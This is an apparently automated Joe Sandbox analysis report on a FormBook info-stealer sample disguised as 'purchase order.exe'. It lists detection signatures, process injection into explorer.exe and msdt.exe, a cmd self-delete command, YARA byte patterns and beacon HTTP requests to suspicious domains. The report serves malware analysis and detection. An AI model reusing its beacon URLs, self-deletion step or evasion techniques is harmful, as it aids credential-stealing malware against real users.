Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report purchase order.exe

Overview

General Information

Sample Name:purchase order.exe
Analysis ID:323034
MD5:975187a07455d3cbf38ec878d893b490
SHA1:af8ddbf775cdb9dbd3776f717c192094202127be
SHA256:009d9a0f6fafa91b750271413fef5771a4ce5855a59c0e6c16c85eb7de08e52b
Tags:exeFormbook

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • purchase order.exe (PID: 3900 cmdline: 'C:\Users\user\Desktop\purchase order.exe' MD5: 975187A07455D3CBF38EC878D893B490)
    • purchase order.exe (PID: 4672 cmdline: C:\Users\user\Desktop\purchase order.exe MD5: 975187A07455D3CBF38EC878D893B490)
      • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msdt.exe (PID: 6468 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
          • cmd.exe (PID: 6508 cmdline: /c del 'C:\Users\user\Desktop\purchase order.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.355472784.0000000002EA7000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
    00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18409:$sqlite3step: 68 34 1C 7B E1
      • 0x1851c:$sqlite3step: 68 34 1C 7B E1
      • 0x18438:$sqlite3text: 68 38 2A 90 C5
      • 0x1855d:$sqlite3text: 68 38 2A 90 C5
      • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
      00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
        Click to see the 18 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.purchase order.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.2.purchase order.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          2.2.purchase order.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x18409:$sqlite3step: 68 34 1C 7B E1
          • 0x1851c:$sqlite3step: 68 34 1C 7B E1
          • 0x18438:$sqlite3text: 68 38 2A 90 C5
          • 0x1855d:$sqlite3text: 68 38 2A 90 C5
          • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
          2.2.purchase order.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            2.2.purchase order.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
            • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
            • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
            • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
            • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
            • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
            • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
            • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
            • 0x1a6e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
            • 0x1b6ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
            Click to see the 1 entries

            Sigma Overview

            No Sigma rule has matched

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Multi AV Scanner detection for submitted fileShow sources
            Source: purchase order.exeVirustotal: Detection: 28%Perma Link
            Source: purchase order.exeReversingLabs: Detection: 19%
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.394597129.00000000014A0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.356215152.0000000003D27000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.599779534.0000000000E10000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.599557812.0000000000950000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.394487409.0000000001470000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 2.2.purchase order.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.purchase order.exe.400000.0.unpack, type: UNPACKEDPE
            Machine Learning detection for sampleShow sources
            Source: purchase order.exeJoe Sandbox ML: detected
            Source: 2.2.purchase order.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h0_2_06A2A760
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h0_2_06A2A755
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h0_2_06A21CEC
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h0_2_06A21CF8

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.6:49750
            Source: global trafficHTTP traffic detected: GET /sbmh/?0PJtBJ=kHp9H1tPAFmVsD64lxBGFA2zeARzx9tS7bJBiT/v97zwTY8F+uE1Nk95aq19aJdA0x4qnOoYAg==&jDHXG=aFNTklSp HTTP/1.1Host: www.rettexo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /sbmh/?0PJtBJ=XEJriTYCOuK+SyY/9HWJgPQ+bcG3K3zE43eWtlfOSAWdxw4RjD6D9w7NiRikfKNtMf925IUbyw==&jDHXG=aFNTklSp HTTP/1.1Host: www.makgxoimisitzer.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /sbmh/?0PJtBJ=h/URaQ6chuqxS5rd6TDMT0L901DFCS1Z5y5lZa0zhzexAXZp9SqL0GSPheeJSC1M62VUMIayeg==&jDHXG=aFNTklSp HTTP/1.1Host: www.purehempbotanicalsinfo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: Joe Sandbox ViewIP Address: 34.102.136.180 34.102.136.180
            Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
            Source: Joe Sandbox ViewASN Name: UNMETEREDCA UNMETEREDCA
            Source: Joe Sandbox ViewASN Name: TOTAL-SERVER-SOLUTIONSUS TOTAL-SERVER-SOLUTIONSUS
            Source: global trafficHTTP traffic detected: GET /sbmh/?0PJtBJ=kHp9H1tPAFmVsD64lxBGFA2zeARzx9tS7bJBiT/v97zwTY8F+uE1Nk95aq19aJdA0x4qnOoYAg==&jDHXG=aFNTklSp HTTP/1.1Host: www.rettexo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /sbmh/?0PJtBJ=XEJriTYCOuK+SyY/9HWJgPQ+bcG3K3zE43eWtlfOSAWdxw4RjD6D9w7NiRikfKNtMf925IUbyw==&jDHXG=aFNTklSp HTTP/1.1Host: www.makgxoimisitzer.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /sbmh/?0PJtBJ=h/URaQ6chuqxS5rd6TDMT0L901DFCS1Z5y5lZa0zhzexAXZp9SqL0GSPheeJSC1M62VUMIayeg==&jDHXG=aFNTklSp HTTP/1.1Host: www.purehempbotanicalsinfo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: unknownDNS traffic detected: queries for: g.msn.com
            Source: explorer.exe, 00000003.00000000.379162690.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
            Source: purchase order.exe, 00000000.00000002.355213949.0000000002CD1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: explorer.exe, 00000003.00000000.379162690.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: explorer.exe, 00000003.00000000.357823561.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
            Source: explorer.exe, 00000003.00000000.379162690.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: explorer.exe, 00000003.00000000.379162690.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: explorer.exe, 00000003.00000000.379162690.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: explorer.exe, 00000003.00000000.379162690.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: explorer.exe, 00000003.00000000.379162690.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: explorer.exe, 00000003.00000000.379162690.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
            Source: explorer.exe, 00000003.00000000.379162690.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: explorer.exe, 00000003.00000000.379162690.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: explorer.exe, 00000003.00000000.379162690.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: explorer.exe, 00000003.00000000.379162690.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
            Source: explorer.exe, 00000003.00000000.379162690.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: explorer.exe, 00000003.00000000.379162690.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: explorer.exe, 00000003.00000000.379162690.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: explorer.exe, 00000003.00000000.379162690.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: explorer.exe, 00000003.00000000.379162690.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: explorer.exe, 00000003.00000000.379162690.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: explorer.exe, 00000003.00000000.379162690.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: explorer.exe, 00000003.00000000.379162690.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: explorer.exe, 00000003.00000000.379162690.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: explorer.exe, 00000003.00000000.379162690.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: explorer.exe, 00000003.00000000.379162690.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
            Source: explorer.exe, 00000003.00000000.379162690.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
            Source: explorer.exe, 00000003.00000000.379162690.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: explorer.exe, 00000003.00000000.379162690.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

            E-Banking Fraud:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.394597129.00000000014A0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.356215152.0000000003D27000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.599779534.0000000000E10000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.599557812.0000000000950000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.394487409.0000000001470000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 2.2.purchase order.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.purchase order.exe.400000.0.unpack, type: UNPACKEDPE

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000002.00000002.394597129.00000000014A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000002.00000002.394597129.00000000014A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.356215152.0000000003D27000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.356215152.0000000003D27000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.599779534.0000000000E10000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.599779534.0000000000E10000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.599557812.0000000000950000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.599557812.0000000000950000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000002.00000002.394487409.0000000001470000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000002.00000002.394487409.0000000001470000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 2.2.purchase order.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 2.2.purchase order.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 2.2.purchase order.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 2.2.purchase order.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Initial sample is a PE file and has a suspicious nameShow sources
            Source: initial sampleStatic PE information: Filename: purchase order.exe
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 0_2_02B1015C NtQueryInformationProcess,0_2_02B1015C
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 0_2_02B10B88 NtQueryInformationProcess,0_2_02B10B88
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0041A050 NtClose,2_2_0041A050
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0041A100 NtAllocateVirtualMemory,2_2_0041A100
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_00419F20 NtCreateFile,2_2_00419F20
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_00419FD0 NtReadFile,2_2_00419FD0
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_00419FCA NtReadFile,2_2_00419FCA
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E9910 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_017E9910
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E99A0 NtCreateSection,LdrInitializeThunk,2_2_017E99A0
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E9860 NtQuerySystemInformation,LdrInitializeThunk,2_2_017E9860
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E9840 NtDelayExecution,LdrInitializeThunk,2_2_017E9840
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E98F0 NtReadVirtualMemory,LdrInitializeThunk,2_2_017E98F0
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E9A50 NtCreateFile,LdrInitializeThunk,2_2_017E9A50
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E9A20 NtResumeThread,LdrInitializeThunk,2_2_017E9A20
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E9A00 NtProtectVirtualMemory,LdrInitializeThunk,2_2_017E9A00
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E9540 NtReadFile,LdrInitializeThunk,2_2_017E9540
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E95D0 NtClose,LdrInitializeThunk,2_2_017E95D0
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E9710 NtQueryInformationToken,LdrInitializeThunk,2_2_017E9710
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E97A0 NtUnmapViewOfSection,LdrInitializeThunk,2_2_017E97A0
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E9780 NtMapViewOfSection,LdrInitializeThunk,2_2_017E9780
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E9660 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_017E9660
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E96E0 NtFreeVirtualMemory,LdrInitializeThunk,2_2_017E96E0
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E9950 NtQueueApcThread,2_2_017E9950
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E99D0 NtCreateProcessEx,2_2_017E99D0
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017EB040 NtSuspendThread,2_2_017EB040
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E9820 NtEnumerateKey,2_2_017E9820
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E98A0 NtWriteVirtualMemory,2_2_017E98A0
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E9B00 NtSetValueKey,2_2_017E9B00
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017EA3B0 NtGetContextThread,2_2_017EA3B0
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E9A10 NtQuerySection,2_2_017E9A10
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E9A80 NtOpenDirectoryObject,2_2_017E9A80
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E9560 NtWriteFile,2_2_017E9560
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017EAD30 NtSetContextThread,2_2_017EAD30
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E9520 NtWaitForSingleObject,2_2_017E9520
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E95F0 NtQueryInformationFile,2_2_017E95F0
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017EA770 NtOpenThread,2_2_017EA770
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E9770 NtSetInformationFile,2_2_017E9770
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E9760 NtOpenProcess,2_2_017E9760
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E9730 NtQueryVirtualMemory,2_2_017E9730
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017EA710 NtOpenProcessToken,2_2_017EA710
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E9FE0 NtCreateMutant,2_2_017E9FE0
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E9670 NtQueryInformationProcess,2_2_017E9670
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E9650 NtQueryValueKey,2_2_017E9650
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E9610 NtEnumerateValueKey,2_2_017E9610
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E96D0 NtCreateKey,2_2_017E96D0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048995D0 NtClose,LdrInitializeThunk,5_2_048995D0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04899540 NtReadFile,LdrInitializeThunk,5_2_04899540
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048996D0 NtCreateKey,LdrInitializeThunk,5_2_048996D0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048996E0 NtFreeVirtualMemory,LdrInitializeThunk,5_2_048996E0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04899650 NtQueryValueKey,LdrInitializeThunk,5_2_04899650
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04899660 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_04899660
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04899780 NtMapViewOfSection,LdrInitializeThunk,5_2_04899780
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04899FE0 NtCreateMutant,LdrInitializeThunk,5_2_04899FE0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04899710 NtQueryInformationToken,LdrInitializeThunk,5_2_04899710
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04899840 NtDelayExecution,LdrInitializeThunk,5_2_04899840
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04899860 NtQuerySystemInformation,LdrInitializeThunk,5_2_04899860
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048999A0 NtCreateSection,LdrInitializeThunk,5_2_048999A0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04899910 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_04899910
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04899A50 NtCreateFile,LdrInitializeThunk,5_2_04899A50
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048995F0 NtQueryInformationFile,5_2_048995F0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04899520 NtWaitForSingleObject,5_2_04899520
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0489AD30 NtSetContextThread,5_2_0489AD30
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04899560 NtWriteFile,5_2_04899560
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04899610 NtEnumerateValueKey,5_2_04899610
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04899670 NtQueryInformationProcess,5_2_04899670
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048997A0 NtUnmapViewOfSection,5_2_048997A0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0489A710 NtOpenProcessToken,5_2_0489A710
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04899730 NtQueryVirtualMemory,5_2_04899730
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04899760 NtOpenProcess,5_2_04899760
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0489A770 NtOpenThread,5_2_0489A770
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04899770 NtSetInformationFile,5_2_04899770
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048998A0 NtWriteVirtualMemory,5_2_048998A0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048998F0 NtReadVirtualMemory,5_2_048998F0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04899820 NtEnumerateKey,5_2_04899820
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0489B040 NtSuspendThread,5_2_0489B040
